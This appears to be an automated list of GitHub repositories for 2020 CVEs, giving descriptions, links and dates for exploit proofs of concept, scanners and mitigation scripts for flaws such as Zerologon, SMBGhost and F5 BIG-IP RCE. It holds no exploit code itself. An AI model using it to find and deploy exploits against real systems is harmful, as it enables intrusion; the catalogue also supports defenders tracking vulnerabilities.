**None** : [mr-r3b00t/CVE-2020-1350](https://api.github.com/repos/mr-r3b00t/CVE-2020-1350) create time: 2020-07-14T19:28:46Z

**Comprueba si su servidor DNS es vulnerable a la ejecución remota de código.** : [Secuora-Org/CVE-2020-1350-checker.ps1](https://api.github.com/repos/Secuora-Org/CVE-2020-1350-checker.ps1) create time: 2020-07-20T09:12:07Z

**None** : [bit4woo/CVE-2020-13925](https://api.github.com/repos/bit4woo/CVE-2020-13925) create time: 2020-07-20T10:38:14Z

**None** : [DaBoQuan/CVE-2020-14645](https://api.github.com/repos/DaBoQuan/CVE-2020-14645) create time: 2020-07-20T11:40:09Z

**DNS Vulnerability - CVE-2020-1350** : [CVEmaster/CVE-2020-1350](https://api.github.com/repos/CVEmaster/CVE-2020-1350) create time: 2020-07-19T17:32:47Z

**Artica Proxy before 4.30.000000 Community Edition allows Reflected Cross Site Scripting.** : [pratikshad19/CVE-2020-15053](https://api.github.com/repos/pratikshad19/CVE-2020-15053) create time: 2020-07-07T09:21:30Z

**Artica Proxy before 4.30.000000 Community Edition allows SQL Injection.** : [pratikshad19/CVE-2020-15052](https://api.github.com/repos/pratikshad19/CVE-2020-15052) create time: 2020-07-07T09:13:18Z

**CVE-2020-15051 : Artica Proxy before 4.30.000000 Community Edition allows Stored Cross Site Scripting.** : [pratikshad19/CVE-2020-15051](https://api.github.com/repos/pratikshad19/CVE-2020-15051) create time: 2020-07-07T06:11:04Z

**CVE-2020-1337 Windows Print Spooler Privilege Escalation** : [math1as/CVE-2020-1337-exploit](https://api.github.com/repos/math1as/CVE-2020-1337-exploit) create time: 2020-07-21T08:01:20Z

**None** : [d7x/CVE-2020-12432](https://api.github.com/repos/d7x/CVE-2020-12432) create time: 2020-07-21T11:53:27Z

**None** : [tz4678/cve-2020-9006](https://api.github.com/repos/tz4678/cve-2020-9006) create time: 2020-07-21T05:39:58Z

**PoC for CVE-2020-6287 The PoC in python for add user only, no administrator permission set. Inspired by @zeroSteiner from metasploit. Original Metasploit PR module: https://github.com/rapid7/metasploit-framework/pull/13852/commits/d1e2c75b3eafa7f62a6aba9fbe6220c8da97baa8 This PoC only create user with unauthentication permission and no more administrator permission set. This project is created only for educational purposes and cannot be used for law violation or personal gain. The author of this project is not responsible for any possible harm caused by the materials of this project. Original finding: CVE-2020-6287: Pablo Artuso CVE-2020-6286: Yvan 'iggy' G. Usage: python sap-CVE-2020-6287-add-user.py <HTTP(s)://IP:Port** : [duc-nt/CVE-2020-6287-exploit](https://api.github.com/repos/duc-nt/CVE-2020-6287-exploit) create time: 2020-07-20T18:45:53Z

**None** : [Onapsis/CVE-2020-6287_RECON-scanner](https://api.github.com/repos/Onapsis/CVE-2020-6287_RECON-scanner) create time: 2020-07-21T01:22:45Z

**Proof of Concept exploit for Kubernetes CVE-2020-8559** : [tabbysable/POC-2020-8559](https://api.github.com/repos/tabbysable/POC-2020-8559) create time: 2020-07-22T05:13:01Z

**A powershell script to deploy the registry mitigation key for CVE-2020-1350** : [gdwnet/cve-2020-1350](https://api.github.com/repos/gdwnet/cve-2020-1350) create time: 2020-07-22T12:11:33Z

**Information about Kubernetes CVE-2020-8558, including proof of concept exploit.** : [tabbysable/POC-2020-8558](https://api.github.com/repos/tabbysable/POC-2020-8558) create time: 2020-07-09T06:56:07Z

**sap netweaver portal add user administrator** : [ynsmroztas/CVE-2020-6287-Sap-Add-User](https://api.github.com/repos/ynsmroztas/CVE-2020-6287-Sap-Add-User) create time: 2020-07-22T18:06:02Z

**This is a PoC exploit for CVE-2020-8559 Kubernetes Vulnerability ** : [tdwyer/CVE-2020-8559](https://api.github.com/repos/tdwyer/CVE-2020-8559) create time: 2020-07-22T08:36:41Z

**Brute Force on Supravizio BPM 10.1.2** : [inflixim4be/CVE-2020-15367](https://api.github.com/repos/inflixim4be/CVE-2020-15367) create time: 2020-06-30T15:08:01Z

**None** : [XDev05/CVE-2020-3452-PoC](https://api.github.com/repos/XDev05/CVE-2020-3452-PoC) create time: 2020-07-24T00:39:11Z

**unauth file read in cisco asa & firepower.** : [Loneyers/cve-2020-3452](https://api.github.com/repos/Loneyers/cve-2020-3452) create time: 2020-07-24T05:56:32Z

**None** : [mr-r3b00t/CVE-2020-3452](https://api.github.com/repos/mr-r3b00t/CVE-2020-3452) create time: 2020-07-24T16:26:52Z

**Course enrolments allowed privilege escalation from teacher role into manager role to RCE** : [HoangKien1020/CVE-2020-14321](https://api.github.com/repos/HoangKien1020/CVE-2020-14321) create time: 2020-07-26T01:28:53Z

**A registry-based workaround can be used to help protect an affected Windows server, and it can be implemented without requiring an administrator to restart the server. Because of the volatility of this vulnerability, administrators may have to implement the workaround before they apply the security update in order to enable them to update their systems by using a standard deployment cadence.** : [simeononsecurity/CVE-2020-1350-Fix](https://api.github.com/repos/simeononsecurity/CVE-2020-1350-Fix) create time: 2020-07-26T02:12:36Z

**Simple Vulnerability Checker Wrote by me "@TheCyberViking" and A fellow Researcher who wanted to be left Nameless... you know who you are you beautiful bitch** : [TheCyberViking/CVE-2020-5902-Vuln-Checker](https://api.github.com/repos/TheCyberViking/CVE-2020-5902-Vuln-Checker) create time: 2020-07-09T14:01:29Z

**User Enumeration on Supravizio BPM 10.1.2** : [inflixim4be/CVE-2020-15392](https://api.github.com/repos/inflixim4be/CVE-2020-15392) create time: 2020-06-30T15:07:12Z

**None** : [KaLendsi/CVE-2020-1054](https://api.github.com/repos/KaLendsi/CVE-2020-1054) create time: 2020-07-25T11:56:48Z

**None** : [networksecure/CVE-2020-14065](https://api.github.com/repos/networksecure/CVE-2020-14065) create time: 2020-06-13T08:04:16Z

**None** : [networksecure/CVE-2020-14064](https://api.github.com/repos/networksecure/CVE-2020-14064) create time: 2020-06-13T14:44:49Z

**CVE-2020-1350 Proof-of-Concept** : [connormcgarr/CVE-2020-1350](https://api.github.com/repos/connormcgarr/CVE-2020-1350) create time: 2020-07-17T05:41:19Z

**Cisco Adaptive Security Appliance and FTD Unauthorized Remote File Reading** : [MrCl0wnLab/checker-cve2020-3452](https://api.github.com/repos/MrCl0wnLab/checker-cve2020-3452) create time: 2020-07-28T04:40:54Z

**Workaround for CVE-2020-10663 (vulnerability in json gem)** : [rails-lts/json_cve_2020_10663](https://api.github.com/repos/rails-lts/json_cve_2020_10663) create time: 2020-03-24T09:53:23Z

**Python script to exploit F5 Big-IP CVE-2020-5902 ** : [dunderhay/CVE-2020-5902](https://api.github.com/repos/dunderhay/CVE-2020-5902) create time: 2020-07-06T04:03:58Z

**None** : [pry0cc/CVE-2020-3187](https://api.github.com/repos/pry0cc/CVE-2020-3187) create time: 2020-07-28T00:59:06Z

**None** : [0neb1n/CVE-2020-1349](https://api.github.com/repos/0neb1n/CVE-2020-1349) create time: 2020-07-28T11:33:38Z

**CVE-2020-8163 - Remote code execution of user-provided local names in Rails** : [lucasallan/CVE-2020-8163](https://api.github.com/repos/lucasallan/CVE-2020-8163) create time: 2020-06-19T21:03:05Z

**CVE-2020–9934 POC** : [mattshockl/CVE-2020-9934](https://api.github.com/repos/mattshockl/CVE-2020-9934) create time: 2020-07-27T22:09:01Z

**环境下载** : [ChenZIDu/CVE-2020-14645](https://api.github.com/repos/ChenZIDu/CVE-2020-14645) create time: 2020-07-28T13:05:13Z

**Crafting raw TCP/IP packets to send to poorly configured servers - CVE-2020-8558 PoC** : [rhysemmas/martian-packets](https://api.github.com/repos/rhysemmas/martian-packets) create time: 2020-07-17T14:59:55Z

**CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script** : [Gh0st0ne/http-vuln-cve2020-3452.nse](https://api.github.com/repos/Gh0st0ne/http-vuln-cve2020-3452.nse) create time: 2020-07-29T15:57:26Z

**None** : [ggolawski/CVE-2020-9495](https://api.github.com/repos/ggolawski/CVE-2020-9495) create time: 2020-07-29T19:57:32Z

**Proof of concept exploit of Windows Update Orchestrator Service Elevation of Privilege Vulnerability** : [irsl/CVE-2020-1313](https://api.github.com/repos/irsl/CVE-2020-1313) create time: 2020-07-29T15:56:50Z

**CVE-2020-3452 exploit** : [0x5ECF4ULT/CVE-2020-3452](https://api.github.com/repos/0x5ECF4ULT/CVE-2020-3452) create time: 2020-08-01T08:27:11Z

**Code for exploit for CVE-2020-12717** : [wabzqem/covidsafe-CVE-2020-12717-exploit](https://api.github.com/repos/wabzqem/covidsafe-CVE-2020-12717-exploit) create time: 2020-05-11T13:09:52Z

** Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection** : [mkelepce/CVE-2020-15399](https://api.github.com/repos/mkelepce/CVE-2020-15399) create time: 2020-08-02T14:35:26Z

** Dolibarr 11.0.3 - Persistent Cross-Site Scripting** : [mkelepce/CVE-2020-13094](https://api.github.com/repos/mkelepce/CVE-2020-13094) create time: 2020-08-02T14:43:43Z

** Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)** : [mkelepce/CVE-2020-13424](https://api.github.com/repos/mkelepce/CVE-2020-13424) create time: 2020-08-02T14:46:10Z

** Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection** : [mkelepce/CVE-2020-13996](https://api.github.com/repos/mkelepce/CVE-2020-13996) create time: 2020-08-02T14:50:04Z

**Little, stupid python validator(?) for CVE-2020-3452 on CISCO devices.** : [foulenzer/CVE-2020-3452](https://api.github.com/repos/foulenzer/CVE-2020-3452) create time: 2020-07-25T16:11:55Z

**POC for CVE-2020-13151** : [b4ny4n/CVE-2020-13151](https://api.github.com/repos/b4ny4n/CVE-2020-13151) create time: 2020-08-01T14:29:59Z

**CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense** : [paran0id34/CVE-2020-3452](https://api.github.com/repos/paran0id34/CVE-2020-3452) create time: 2020-08-03T11:02:23Z

**Exploit code for CVE-2020-11579, an arbitrary file disclosure through the MySQL client in PHPKB** : [ShielderSec/CVE-2020-11579](https://api.github.com/repos/ShielderSec/CVE-2020-11579) create time: 2020-05-19T13:12:48Z

**ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload.** : [megamagnus/cve-2020-15956](https://api.github.com/repos/megamagnus/cve-2020-15956) create time: 2020-08-04T03:27:24Z

**PoC of CVE-2020-0108** : [CrackerCat/ServiceCheater](https://api.github.com/repos/CrackerCat/ServiceCheater) create time: 2020-08-05T04:50:42Z

**None** : [Revanthinfosec/CVE-2020-BIG-IP](https://api.github.com/repos/Revanthinfosec/CVE-2020-BIG-IP) create time: 2020-08-05T17:41:44Z

**Pi-hole Remote Code Execution authenticated Version >= 4.3.2** : [cybervaca/CVE-2020-8816](https://api.github.com/repos/cybervaca/CVE-2020-8816) create time: 2020-08-04T10:23:28Z

**Pi-hole ( <= 4.3.2) authenticated remote code execution.** : [team0se7en/CVE-2020-8816](https://api.github.com/repos/team0se7en/CVE-2020-8816) create time: 2020-08-06T14:04:54Z

**None** : [Tobey123/CVE-2020-1472-visualizer](https://api.github.com/repos/Tobey123/CVE-2020-1472-visualizer) create time: 2020-08-12T12:35:56Z

**None** : [DreamoneOnly/CVE-2020-0796-LPE](https://api.github.com/repos/DreamoneOnly/CVE-2020-0796-LPE) create time: 2020-05-17T13:27:36Z

**Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3** : [PushpenderIndia/CVE-2020-5902-Scanner](https://api.github.com/repos/PushpenderIndia/CVE-2020-5902-Scanner) create time: 2020-08-09T11:46:23Z

**Advanced scanner for CVE-2020-0796 - SMBv3 RCE ** : [w1ld3r/SMBGhost_Scanner](https://api.github.com/repos/w1ld3r/SMBGhost_Scanner) create time: 2020-03-14T02:07:16Z

**None** : [cudi1999/CVE-2020-6514](https://api.github.com/repos/cudi1999/CVE-2020-6514) create time: 2020-08-09T20:06:50Z

**None** : [potats0/cve_2020_14644](https://api.github.com/repos/potats0/cve_2020_14644) create time: 2020-08-07T03:42:37Z

**CVE-2020-1337 a bypass of (PrintDemon) CVE-2020-1048’s patch** : [VoidSec/CVE-2020-1337](https://api.github.com/repos/VoidSec/CVE-2020-1337) create time: 2020-08-11T12:22:56Z

**None** : [PerimeterX/CVE-2020-6519](https://api.github.com/repos/PerimeterX/CVE-2020-6519) create time: 2020-08-09T08:25:40Z

**poc for CVE-2020-1337 (Windows Print Spooler Elevation of Privilege)** : [sailay1996/cve-2020-1337-poc](https://api.github.com/repos/sailay1996/cve-2020-1337-poc) create time: 2020-08-12T10:05:36Z

**Determine the Version Running on the Palo Alto Network Firewall for the Global Protect Portal** : [blackhatethicalhacking/CVE-2020-2034-POC](https://api.github.com/repos/blackhatethicalhacking/CVE-2020-2034-POC) create time: 2020-08-08T14:19:44Z

**None** : [dwisiswant0/CVE-2020-9496](https://api.github.com/repos/dwisiswant0/CVE-2020-9496) create time: 2020-08-15T14:29:49Z

**Telia Technicolor TG389ac v.17.1.7992 Samba privilege escalation exploit** : [full-disclosure/FDEU-CVE-2020-1FC5](https://api.github.com/repos/full-disclosure/FDEU-CVE-2020-1FC5) create time: 2020-08-14T11:47:37Z

**None** : [superzerosec/cve-2020-5902](https://api.github.com/repos/superzerosec/cve-2020-5902) create time: 2020-08-18T15:04:08Z

**None** : [minutesinch/CVE-2020-0041](https://api.github.com/repos/minutesinch/CVE-2020-0041) create time: 2020-08-19T14:44:48Z

**None** : [minutesinch/CVE-2020-0041-Original](https://api.github.com/repos/minutesinch/CVE-2020-0041-Original) create time: 2020-08-19T14:45:28Z

**None** : [ctlyz123/CVE-2020-17496](https://api.github.com/repos/ctlyz123/CVE-2020-17496) create time: 2020-08-20T12:20:03Z

**CVE-2020-1048 bypass: binary planting PoC** : [neofito/CVE-2020-1337](https://api.github.com/repos/neofito/CVE-2020-1337) create time: 2020-08-11T14:34:07Z

**Multithread SMB scanner to check CVE-2020-0796 for SMB v3.11** : [gabimarti/SMBScanner](https://api.github.com/repos/gabimarti/SMBScanner) create time: 2020-03-12T20:07:44Z

**None** : [victomteng1997/cve-2020-7471-Time_Blind_SQLi-](https://api.github.com/repos/victomteng1997/cve-2020-7471-Time_Blind_SQLi-) create time: 2020-08-22T14:23:08Z

**None** : [f5devcentral/cve-2020-5902-ioc-bigip-checker](https://api.github.com/repos/f5devcentral/cve-2020-5902-ioc-bigip-checker) create time: 2020-07-20T19:10:09Z

**BootHole vulnerability (CVE-2020-10713). detection script, links and other mitigation related materials** : [eclypsium/BootHole](https://api.github.com/repos/eclypsium/BootHole) create time: 2020-07-29T00:01:41Z

**WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册蚁剑filter内存shell** : [Y4er/WebLogic-Shiro-shell](https://api.github.com/repos/Y4er/WebLogic-Shiro-shell) create time: 2020-08-19T03:34:06Z

**None** : [0neb1n/CVE-2020-1493](https://api.github.com/repos/0neb1n/CVE-2020-1493) create time: 2020-08-25T05:25:45Z

**I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.** : [w4cky/CVE-2020-11794](https://api.github.com/repos/w4cky/CVE-2020-11794) create time: 2020-05-05T09:39:55Z

**该资源为CVE-2020-0796漏洞复现,包括Python版本和C++版本。主要是集合了github大神们的资源,希望您喜欢~** : [eastmountyxz/CVE-2020-0796-SMB](https://api.github.com/repos/eastmountyxz/CVE-2020-0796-SMB) create time: 2020-04-02T12:12:03Z

**[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)** : [murataydemir/CVE-2020-0688](https://api.github.com/repos/murataydemir/CVE-2020-0688) create time: 2020-08-17T12:41:51Z

**[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal** : [murataydemir/CVE-2020-6286](https://api.github.com/repos/murataydemir/CVE-2020-6286) create time: 2020-08-13T09:00:12Z

**[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)** : [murataydemir/CVE-2020-5902](https://api.github.com/repos/murataydemir/CVE-2020-5902) create time: 2020-08-13T08:27:25Z

**CVE-2020-3452 Cisco ASA Scanner -unauth Path Traversal Check** : [PR3R00T/CVE-2020-3452-Cisco-Scanner](https://api.github.com/repos/PR3R00T/CVE-2020-3452-Cisco-Scanner) create time: 2020-07-24T15:04:45Z

**PoC of Full Account Takeover on RAD SecFlow-1v ** : [UrielYochpaz/CVE-2020-13259](https://api.github.com/repos/UrielYochpaz/CVE-2020-13259) create time: 2020-08-31T13:22:21Z

**None** : [underprotection/CVE-2020-24028](https://api.github.com/repos/underprotection/CVE-2020-24028) create time: 2020-08-31T18:00:21Z

**None** : [underprotection/CVE-2020-24030](https://api.github.com/repos/underprotection/CVE-2020-24030) create time: 2020-08-31T18:38:58Z

**None** : [underprotection/CVE-2020-24029](https://api.github.com/repos/underprotection/CVE-2020-24029) create time: 2020-08-31T18:26:05Z

**Explanation and PoC for CVE-2020-16152** : [eriknl/CVE-2020-16152](https://api.github.com/repos/eriknl/CVE-2020-16152) create time: 2020-08-30T12:18:12Z

**SUPERAntiSyware Professional X Trial <= 10.0.1206 Local Privilege Escalation** : [b1nary0x1/CVE-2020-24955](https://api.github.com/repos/b1nary0x1/CVE-2020-24955) create time: 2020-09-02T02:48:36Z

**Exploit for CVE-2020-13162** : [redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-](https://api.github.com/repos/redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-) create time: 2020-09-02T17:58:32Z

**PoC for CVE-2020-11896 Treck TCP/IP stack and device asset investigation** : [Fans0n-Fan/Treck20-Related](https://api.github.com/repos/Fans0n-Fan/Treck20-Related) create time: 2020-07-21T03:38:31Z

**Python script to exploit CVE-2020-25068. ** : [bryanroma/CVE-2020-25068](https://api.github.com/repos/bryanroma/CVE-2020-25068) create time: 2020-09-02T14:53:57Z

**Analysis of job sectors in past recessions** : [striblab/20200322-cvecon](https://api.github.com/repos/striblab/20200322-cvecon) create time: 2020-03-19T20:08:37Z

**2020l4web-first-repository-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-first-repository-DanCvejn](https://api.github.com/repos/pslib-cz/2020l4web-first-repository-DanCvejn) create time: 2020-09-04T08:25:53Z

**Exploits for CVE-2020-5902 POC ** : [itsjeffersonli/CVE-2020-5902](https://api.github.com/repos/itsjeffersonli/CVE-2020-5902) create time: 2020-07-09T14:08:54Z

**Tool to test for existence of CVE-2020-8218** : [withdk/pulse-gosecure-rce-poc](https://api.github.com/repos/withdk/pulse-gosecure-rce-poc) create time: 2020-08-29T16:40:35Z

**None** : [anjai94/CVE-2020-9484-exploit](https://api.github.com/repos/anjai94/CVE-2020-9484-exploit) create time: 2020-09-05T13:56:51Z

**cve-2020-24616 poc** : [0xkami/cve-2020-24616-poc](https://api.github.com/repos/0xkami/cve-2020-24616-poc) create time: 2020-09-03T10:18:39Z

**CVE-2020-0014-Toast-复现** : [tea9/CVE-2020-0014-Toast](https://api.github.com/repos/tea9/CVE-2020-0014-Toast) create time: 2020-09-04T09:02:29Z

**Details of CVE-2020-14292** : [alwentiu/CVE-2020-14292](https://api.github.com/repos/alwentiu/CVE-2020-14292) create time: 2020-08-20T05:24:30Z

**pritunl-CVE-2020-25200** : [lukaszstu/pritunl-CVE-2020-25200](https://api.github.com/repos/lukaszstu/pritunl-CVE-2020-25200) create time: 2020-09-06T22:11:24Z

**None** : [tea9/CVE-2020-0114-systemui](https://api.github.com/repos/tea9/CVE-2020-0114-systemui) create time: 2020-09-08T06:06:36Z

**Interactive RCE exploit demo for Eclipse CHE** : [codingchili/CVE-2020-14368](https://api.github.com/repos/codingchili/CVE-2020-14368) create time: 2020-04-06T17:30:11Z

**CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code** : [gerhart01/hyperv_local_dos_poc](https://api.github.com/repos/gerhart01/hyperv_local_dos_poc) create time: 2020-09-03T14:45:51Z

**Cobalt Strike AggressorScripts CVE-2020-0796** : [Rvn0xsy/CVE_2020_0796_CNA](https://api.github.com/repos/Rvn0xsy/CVE_2020_0796_CNA) create time: 2020-04-06T15:16:10Z

**TP-LINK Multiple HTML Injection Vulnerabilities ** : [g-rubert/CVE-2020-14965](https://api.github.com/repos/g-rubert/CVE-2020-14965) create time: 2020-06-23T01:23:26Z

**Stored Cross Site Scripting - Iframe Plugin - WordPress ** : [g-rubert/CVE-2020-12696](https://api.github.com/repos/g-rubert/CVE-2020-12696) create time: 2020-05-07T15:16:39Z

**Stored Cross Site Scripting - Oempro ** : [g-rubert/CVE-2020-9461](https://api.github.com/repos/g-rubert/CVE-2020-9461) create time: 2020-03-05T17:03:25Z

**Stored Cross Site Scripting - Oempro ** : [g-rubert/CVE-2020-9460](https://api.github.com/repos/g-rubert/CVE-2020-9460) create time: 2020-03-05T17:03:03Z

**None** : [Ph4nt0m-b/CVE-2020-3187](https://api.github.com/repos/Ph4nt0m-b/CVE-2020-3187) create time: 2020-09-10T06:33:01Z

**Support ALL Windows Version** : [cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION](https://api.github.com/repos/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION) create time: 2020-06-16T08:57:51Z

**CVE-2020-13933 靶场: shiro 认证绕过漏洞** : [lyy289065406/CVE-2020-13933](https://api.github.com/repos/lyy289065406/CVE-2020-13933) create time: 2020-09-09T10:20:25Z

**EasyAntiCheat Integrity check bypass by mimicking memory changes** : [thesecretclub/CVEAC-2020](https://api.github.com/repos/thesecretclub/CVEAC-2020) create time: 2020-04-09T14:53:01Z

**for 供養** : [Goyotan/CVE-2020-6468-PoC](https://api.github.com/repos/Goyotan/CVE-2020-6468-PoC) create time: 2020-09-14T12:36:56Z

**None** : [cube0x0/CVE-2020-1472](https://api.github.com/repos/cube0x0/CVE-2020-1472) create time: 2020-09-14T16:52:37Z

**CVE-2020-25518, CVE-2020-25519** : [g-rubert/wordpress_DoS](https://api.github.com/repos/g-rubert/wordpress_DoS) create time: 2020-09-11T14:14:36Z

**CVE-2020-1472漏洞复现过程** : [0xkami/CVE-2020-1472](https://api.github.com/repos/0xkami/CVE-2020-1472) create time: 2020-09-15T10:25:47Z

**None** : [s0wr0b1ndef/CVE-2020-1472](https://api.github.com/repos/s0wr0b1ndef/CVE-2020-1472) create time: 2020-09-15T13:50:01Z

**CVE-2020-1472** : [422926799/CVE-2020-1472](https://api.github.com/repos/422926799/CVE-2020-1472) create time: 2020-09-15T16:36:40Z

**Ladon Moudle CVE-2020-1472 Exploit 域控提权神器** : [k8gege/CVE-2020-1472-EXP](https://api.github.com/repos/k8gege/CVE-2020-1472-EXP) create time: 2020-09-15T16:10:21Z

**Tesla Model 3 Hack DoS Entire Touchscreen Interface CVE-2020-10558** : [nuzzl/CVE-2020-10558](https://api.github.com/repos/nuzzl/CVE-2020-10558) create time: 2020-03-16T16:55:18Z

**Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472** : [scv-m/zabbix-template-CVE-2020-1472](https://api.github.com/repos/scv-m/zabbix-template-CVE-2020-1472) create time: 2020-09-16T02:37:52Z

**None** : [Fa1c0n35/CVE-2020-1472](https://api.github.com/repos/Fa1c0n35/CVE-2020-1472) create time: 2020-09-16T03:54:27Z

**None** : [Fa1c0n35/SecuraBV-CVE-2020-1472](https://api.github.com/repos/Fa1c0n35/SecuraBV-CVE-2020-1472) create time: 2020-09-16T03:57:04Z

**CVE-2020-1472 - Zero Logon vulnerability Python implementation** : [CanciuCostin/CVE-2020-1472](https://api.github.com/repos/CanciuCostin/CVE-2020-1472) create time: 2020-09-16T07:25:22Z

**CVE-2020-1472复现流程** : [NAXG/CVE-2020-1472](https://api.github.com/repos/NAXG/CVE-2020-1472) create time: 2020-09-15T12:11:49Z

**cve-2020-1472_Tool collection** : [0xcccc666/cve-2020-1472_Tool-collection](https://api.github.com/repos/0xcccc666/cve-2020-1472_Tool-collection) create time: 2020-09-16T08:32:52Z

**https://github.com/dirkjanm/CVE-2020-1472** : [npocmak/CVE-2020-1472](https://api.github.com/repos/npocmak/CVE-2020-1472) create time: 2020-09-16T09:54:09Z

**PoC for Zerologon (CVE-2020-1472) - Exploit** : [harshil-shah004/zerologon-CVE-2020-1472](https://api.github.com/repos/harshil-shah004/zerologon-CVE-2020-1472) create time: 2020-09-15T14:29:24Z

**Abuse CVE-2020-1472 (Zerologon) to take over a domain and then repair the local stored machine account password.** : [bb00/zer0dump](https://api.github.com/repos/bb00/zer0dump) create time: 2020-09-14T19:27:14Z

**None** : [victim10wq3/CVE-2020-1472](https://api.github.com/repos/victim10wq3/CVE-2020-1472) create time: 2020-09-16T14:25:54Z

**cve-2020-1472 复现利用及其exp** : [mstxq17/cve-2020-1472](https://api.github.com/repos/mstxq17/cve-2020-1472) create time: 2020-09-16T03:40:47Z

**[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) & Cisco Firepower Threat Defense (FTD) Web Service Read-Only Directory Traversal** : [murataydemir/CVE-2020-3452](https://api.github.com/repos/murataydemir/CVE-2020-3452) create time: 2020-08-13T08:22:27Z

**[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)** : [murataydemir/CVE-2020-1472](https://api.github.com/repos/murataydemir/CVE-2020-1472) create time: 2020-09-16T09:22:30Z

**None** : [rsmudge/CVE-2020-0796-BOF](https://api.github.com/repos/rsmudge/CVE-2020-0796-BOF) create time: 2020-09-17T01:48:37Z

**None** : [mos165/CVE-20200-1472](https://api.github.com/repos/mos165/CVE-20200-1472) create time: 2020-09-17T23:59:23Z

**None** : [cgwalters/cve-2020-14386](https://api.github.com/repos/cgwalters/cve-2020-14386) create time: 2020-09-17T21:25:18Z

** CVE-2020-1472复现时使用的py文件整理打包** : [sv3nbeast/CVE-2020-1472](https://api.github.com/repos/sv3nbeast/CVE-2020-1472) create time: 2020-09-18T00:02:26Z

**Exploit for uTorrent vulnerability CVE-2020-8437 by whtaguy** : [guywhataguy/uTorrent-CVE-2020-8437](https://api.github.com/repos/guywhataguy/uTorrent-CVE-2020-8437) create time: 2020-09-18T01:03:18Z

**None** : [Uvemode/CVE-2020-2555](https://api.github.com/repos/Uvemode/CVE-2020-2555) create time: 2020-09-18T12:37:20Z

**CVE-2020-25747** : [jet-pentest/CVE-2020-25747](https://api.github.com/repos/jet-pentest/CVE-2020-25747) create time: 2020-09-18T14:23:35Z

**CVE-2020-25748** : [jet-pentest/CVE-2020-25748](https://api.github.com/repos/jet-pentest/CVE-2020-25748) create time: 2020-09-18T15:03:38Z

**CVE-2020-25749** : [jet-pentest/CVE-2020-25749](https://api.github.com/repos/jet-pentest/CVE-2020-25749) create time: 2020-09-18T15:05:16Z

**[CVE-2020-6287] SAP NetWeaver AS JAVA (LM Configuration Wizard) Authentication Bypass (Create Simple & Administrator Java User)** : [murataydemir/CVE-2020-6287](https://api.github.com/repos/murataydemir/CVE-2020-6287) create time: 2020-08-13T09:12:37Z

**A simple implementation/code smash of a bunch of other repos** : [midpipps/CVE-2020-1472-Easy](https://api.github.com/repos/midpipps/CVE-2020-1472-Easy) create time: 2020-09-19T20:44:40Z

**None** : [hectorgie/CVE-2020-1472](https://api.github.com/repos/hectorgie/CVE-2020-1472) create time: 2020-09-19T23:15:41Z

**None** : [mugisyahid/ki-vuln-cve-2020-5410](https://api.github.com/repos/mugisyahid/ki-vuln-cve-2020-5410) create time: 2020-09-20T19:13:17Z

**An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'.** : [Ken-Abruzzi/CVE-2020-1048](https://api.github.com/repos/Ken-Abruzzi/CVE-2020-1048) create time: 2020-09-21T01:59:38Z

**几条关于CVE-2020-15148(yii2反序列化)的绕过** : [Maskhe/CVE-2020-15148-bypasses](https://api.github.com/repos/Maskhe/CVE-2020-15148-bypasses) create time: 2020-09-21T03:55:55Z

**None** : [t31m0/CVE-2020-1472](https://api.github.com/repos/t31m0/CVE-2020-1472) create time: 2020-09-21T07:24:03Z

**Proof of Concept of CVE-2020-15873 - Blind SQL Injection in Librenms < v1.65.1** : [limerencee/cs4239-cve-2020-15873](https://api.github.com/repos/limerencee/cs4239-cve-2020-15873) create time: 2020-09-15T10:26:26Z

**SQL injection Vulnerability in Zoo Management System** : [Ko-kn3t/CVE-2020-25487](https://api.github.com/repos/Ko-kn3t/CVE-2020-25487) create time: 2020-09-22T16:37:46Z

**Login Bypass in Simple Library Management System 1.0** : [Ko-kn3t/CVE-2020-25514](https://api.github.com/repos/Ko-kn3t/CVE-2020-25514) create time: 2020-09-22T16:52:15Z

**Login Bypass in Zoo Management System V1.0** : [Ko-kn3t/CVE-2020-25488](https://api.github.com/repos/Ko-kn3t/CVE-2020-25488) create time: 2020-09-22T16:28:34Z

**Unrestricted File Upload in Simple Library Management System 1.0** : [Ko-kn3t/CVE-2020-25515](https://api.github.com/repos/Ko-kn3t/CVE-2020-25515) create time: 2020-09-22T17:23:21Z

**cve-2020-13933 apache shiro权限绕过漏洞** : [0xkami/cve-2020-13933](https://api.github.com/repos/0xkami/cve-2020-13933) create time: 2020-09-23T01:55:46Z

**PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City** : [Ko-kn3t/CVE-2020-25270](https://api.github.com/repos/Ko-kn3t/CVE-2020-25270) create time: 2020-09-23T03:16:08Z

**None** : [Ko-kn3t/CVE-2020-25271](https://api.github.com/repos/Ko-kn3t/CVE-2020-25271) create time: 2020-09-23T03:24:20Z

